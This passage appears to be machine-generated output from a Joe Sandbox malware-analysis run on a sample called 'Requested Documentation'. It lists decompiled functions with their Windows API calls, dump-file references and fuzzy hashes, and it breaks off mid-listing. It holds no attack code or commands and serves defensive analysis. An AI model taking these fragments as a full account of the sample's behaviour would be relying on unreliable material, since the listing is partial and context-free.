                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 009ED81D
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009ED840
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 009ED847
                                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009ED87E
                                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 009ED880
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                              • String ID:
                                                                              • API String ID: 1246142700-0
                                                                              • Opcode ID: c495d1dcc595f8b0e1f75c167d44003bb98219476b736edda91635698553a78e
                                                                              • Instruction ID: 2ffaacc0c998ab71ef0014e932e1aa547069dcd163f84e7f3c2ec0c9520311b2
                                                                              • Opcode Fuzzy Hash: c495d1dcc595f8b0e1f75c167d44003bb98219476b736edda91635698553a78e
                                                                              • Instruction Fuzzy Hash: 0CB10B75A00109AFDB14DFA5C884EAEBBB9FF88304F148469F809EB261DB31ED45CB50
                                                                              Function 009DC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 009DC283
                                                                              • GetWindowRect.USER32(00000000,?), ref: 009DC295
                                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 009DC2F3
                                                                              • GetDlgItem.USER32(?,00000002), ref: 009DC2FE
                                                                              • GetWindowRect.USER32(00000000,?), ref: 009DC310
                                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 009DC364
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 009DC372
                                                                              • GetWindowRect.USER32(00000000,?), ref: 009DC383
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 009DC3C6
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 009DC3D4
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009DC3F1
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 009DC3FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
                                                                              • Instruction ID: 212ae479066cd1760d7adae21dc299eb0a2c692ff8fc89c300661816bcb549df
                                                                              • Opcode Fuzzy Hash: db2f90f1b5677c4d26a442d292671b0708f4a061d8e65b4bc9e4664016273f98
                                                                              • Instruction Fuzzy Hash: 975121B1B40209AFDF18CFA9DD85A6DBBBAEB88711F148129F515E7290D7719D01CB10
                                                                              Function 0098201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009820D3
                                                                              • KillTimer.USER32(-00000001,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 0098216E
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 009BBCA6
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBCD7
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBCEE
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009816CB,00000000,?,?,00981AE2,?,?), ref: 009BBD0A
                                                                              • DeleteObject.GDI32(00000000), ref: 009BBD1C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: 7d7fffcd7c6f769ec473c6a978373251a785429c078496fae1893e98b9ad6ae8
                                                                              • Instruction ID: 8e3bd4816a47a4b697650b696cae4503c40c7e3ca648a55e9be8932cbb72e9ab
                                                                              • Opcode Fuzzy Hash: 7d7fffcd7c6f769ec473c6a978373251a785429c078496fae1893e98b9ad6ae8
                                                                              • Instruction Fuzzy Hash: 0F61B339904A04DFC735EF64D948B2977F5FF81312F104929E5425BAB1C775A882DF90
                                                                              Function 009821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC
                                                                              • GetSysColor.USER32(0000000F), ref: 009821D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
                                                                              • Opcode ID: e41753cfab9ff26c82ea94c0d0f6b8a665645193255ff9e9d9668cff02205198
                                                                              • Instruction ID: 301c19988298c4dd96411e19ce681e96291cdb7986c0b0b872e64e3594c02ff3
                                                                              • Opcode Fuzzy Hash: e41753cfab9ff26c82ea94c0d0f6b8a665645193255ff9e9d9668cff02205198
                                                                              • Instruction Fuzzy Hash: 50417F31000544EFDB29AF68DC88BB93B69EB46331F244365FE659A2E2C7718C42DB61
                                                                              Function 009EA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,00A0F910), ref: 009EA90B
                                                                              • GetDriveTypeW.KERNEL32(00000061,00A389A0,00000061), ref: 009EA9D5
                                                                              • _wcscpy.LIBCMT ref: 009EA9FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2820617543-1000479233
                                                                              • Opcode ID: f769168a3910099eea28d241199a49b77f47b0d810d22c245067af006bbe498c
                                                                              • Instruction ID: d0f82f327c4f5dd2125362d8ca01693202a77c67083f515e4109af33a174320e
                                                                              • Opcode Fuzzy Hash: f769168a3910099eea28d241199a49b77f47b0d810d22c245067af006bbe498c
                                                                              • Instruction Fuzzy Hash: 10517631108341ABC711EF15C892BAEBBA9AFC5344F55482DF496972A2DB31ED09CB93
                                                                              Function 00989837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __i64tow__itow__swprintf
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 421087845-2263619337
                                                                              • Opcode ID: 8d3833df0cf1830bde6c4eecb0d1527d4ac797ea1a6cb77abcf88f09153952f4
                                                                              • Instruction ID: 934aac39711c72486c5569c4dfda991618fa9abc820fde4b6064f54214cf8d45
                                                                              • Opcode Fuzzy Hash: 8d3833df0cf1830bde6c4eecb0d1527d4ac797ea1a6cb77abcf88f09153952f4
                                                                              • Instruction Fuzzy Hash: 3C41F571500206AFDB24EF34CD46BB6B3E8FF86310F24486EF449DA292EA7599418B50
                                                                              Function 00A07152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00A0716A
                                                                              • CreateMenu.USER32 ref: 00A07185
                                                                              • SetMenu.USER32(?,00000000), ref: 00A07194
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A07221
                                                                              • IsMenu.USER32(?), ref: 00A07237
                                                                              • CreatePopupMenu.USER32 ref: 00A07241
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A0726E
                                                                              • DrawMenuBar.USER32 ref: 00A07276
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0$F
                                                                              • API String ID: 176399719-3044882817
                                                                              • Opcode ID: 9176e27f53ff5388d36ac25d6bb08d4cb39b88a42c2501a1c3f3bbbe14997d63
                                                                              • Instruction ID: 65fdd0bc888a830ca94d55983e469ad75c78472534a6ea4c8a90433aa46d0dad
                                                                              • Opcode Fuzzy Hash: 9176e27f53ff5388d36ac25d6bb08d4cb39b88a42c2501a1c3f3bbbe14997d63
                                                                              • Instruction Fuzzy Hash: D8414979A01209EFDB20DFA4E984EDA7BB5FF49310F144129F945A73A1D731A911CF90
                                                                              Function 00A074BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00A0755E
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00A07565
                                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A07578
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A07580
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00A0758B
                                                                              • DeleteDC.GDI32(00000000), ref: 00A07594
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00A0759E
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00A075B2
                                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00A075BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                              • String ID: static
                                                                              • API String ID: 2559357485-2160076837
                                                                              • Opcode ID: c385680df884a36e057e339d369e88fd98adbebcf3a7005f5ce1b7389820e154
                                                                              • Instruction ID: 4c4722e412625b1fa9cb9ae4ab4bd58cfa22d3cbf60c6ab27dea48112a0ebc98
                                                                              • Opcode Fuzzy Hash: c385680df884a36e057e339d369e88fd98adbebcf3a7005f5ce1b7389820e154
                                                                              • Instruction Fuzzy Hash: 25316D72504219BFDF229FA4EC09FDA3B69FF09760F114224FA15A61E0D731E812DBA4
                                                                              Function 009A6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009A6E3E
                                                                                • Part of subcall function 009A8B28: __getptd_noexit.LIBCMT ref: 009A8B28
                                                                              • __gmtime64_s.LIBCMT ref: 009A6ED7
                                                                              • __gmtime64_s.LIBCMT ref: 009A6F0D
                                                                              • __gmtime64_s.LIBCMT ref: 009A6F2A
                                                                              • __allrem.LIBCMT ref: 009A6F80
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A6F9C
                                                                              • __allrem.LIBCMT ref: 009A6FB3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A6FD1
                                                                              • __allrem.LIBCMT ref: 009A6FE8
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009A7006
                                                                              • __invoke_watson.LIBCMT ref: 009A7077
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction ID: 39bf5623de90c16420dcc8122a19516c5aaf606b747b3057e9fd6a89dabfd7bb
                                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction Fuzzy Hash: 5D71F876A00B17ABD714EF78DC42B9AB7A8AF46724F248629F514E72C1E770DD108BD0
                                                                              Function 009E2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2542
                                                                              • GetMenuItemInfoW.USER32(00A45890,000000FF,00000000,00000030), ref: 009E25A3
                                                                              • SetMenuItemInfoW.USER32(00A45890,00000004,00000000,00000030), ref: 009E25D9
                                                                              • Sleep.KERNEL32(000001F4), ref: 009E25EB
                                                                              • GetMenuItemCount.USER32(?), ref: 009E262F
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 009E264B
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 009E2675
                                                                              • GetMenuItemID.USER32(?,?), ref: 009E26BA
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009E2700
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2714
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2735
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: 2cd329b04456d90a3b5fb755c6fc01deed286bede1509e79c8b6b15140df988b
                                                                              • Instruction ID: 814d6382a6f9522af7dcea26a7fadd7e96344f1587164120f3b8b6635a979953
                                                                              • Opcode Fuzzy Hash: 2cd329b04456d90a3b5fb755c6fc01deed286bede1509e79c8b6b15140df988b
                                                                              • Instruction Fuzzy Hash: 5561807490028DAFDB22CFA5CD88EAE7BBCFB45304F14056AE841A7251D772AD06DB21
                                                                              Function 00A06F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A06FA5
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A06FA8
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A06FCC
                                                                              • _memset.LIBCMT ref: 00A06FDD
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A06FEF
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A07067
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 2a0c84c3b883a55b40fa8c7137cd5e22ef8860091bb1c99330e2b0e8150f48dd
                                                                              • Instruction ID: 3a471f0dc772f58ebe13507f70887a4e740569f24933ae40b88580d03c0844d9
                                                                              • Opcode Fuzzy Hash: 2a0c84c3b883a55b40fa8c7137cd5e22ef8860091bb1c99330e2b0e8150f48dd
                                                                              • Instruction Fuzzy Hash: 3A617A75900208AFDB11DFA4DD81EEE77F8EB49710F104169FA14AB2E2C771AD52DBA0
                                                                              Function 009D6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009D6BBF
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 009D6C18
                                                                              • VariantInit.OLEAUT32(?), ref: 009D6C2A
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 009D6C4A
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 009D6C9D
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 009D6CB1
                                                                              • VariantClear.OLEAUT32(?), ref: 009D6CC6
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 009D6CD3
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D6CDC
                                                                              • VariantClear.OLEAUT32(?), ref: 009D6CEE
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D6CF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: e5244649c5841ca2e56916eeefe62bdae8ea963c2a9f5bbcfb2bee84c6812065
                                                                              • Instruction ID: 0fd6f476d1b6cc256b9aa3e059111772c897c6f49d52a7d26caa1c01140a51f0
                                                                              • Opcode Fuzzy Hash: e5244649c5841ca2e56916eeefe62bdae8ea963c2a9f5bbcfb2bee84c6812065
                                                                              • Instruction Fuzzy Hash: 94414F75A4021D9FCF10DFA8D8849AEBBB9EF48354F00C06AE955E7361CB31A946CF90
                                                                              Function 009F83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • CoInitialize.OLE32 ref: 009F8403
                                                                              • CoUninitialize.OLE32 ref: 009F840E
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00A12BEC,?), ref: 009F846E
                                                                              • IIDFromString.OLE32(?,?), ref: 009F84E1
                                                                              • VariantInit.OLEAUT32(?), ref: 009F857B
                                                                              • VariantClear.OLEAUT32(?), ref: 009F85DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: 626e16562678d236bfca5ceb1c4244714022e5ec0209e74a3cdf0a4bfc53271d
                                                                              • Instruction ID: a56b9fae0d509f31a0ab463794ddcad26215fd51f45fad313b8dc9b994671df8
                                                                              • Opcode Fuzzy Hash: 626e16562678d236bfca5ceb1c4244714022e5ec0209e74a3cdf0a4bfc53271d
                                                                              • Instruction Fuzzy Hash: 5161CF7060831AAFC750DF64C848F6FB7E8AF85754F044859FA819B2A1CB74ED49CB92
                                                                              Function 009F5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 009F5793
                                                                              • inet_addr.WSOCK32(?,?,?), ref: 009F57D8
                                                                              • gethostbyname.WSOCK32(?), ref: 009F57E4
                                                                              • IcmpCreateFile.IPHLPAPI ref: 009F57F2
                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5862
                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5878
                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009F58ED
